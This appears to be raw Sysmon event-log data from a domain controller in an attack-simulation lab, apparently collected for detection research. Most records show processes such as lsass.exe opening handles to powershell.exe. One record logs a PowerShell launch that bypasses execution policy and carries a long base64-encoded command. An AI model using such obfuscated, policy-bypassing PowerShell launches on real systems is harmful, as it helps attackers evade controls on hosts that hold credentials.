UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.528{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.528{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.496{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.496{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.496{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.496{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5dgq1qul.wzz.ps12021-01-14 13:08:45.496 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.481{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-425D-6000-D302-000000009901}42882620C:\Windows\system32\cmd.exe{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.450{08A6967A-425D-6000-D402-000000009901}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBA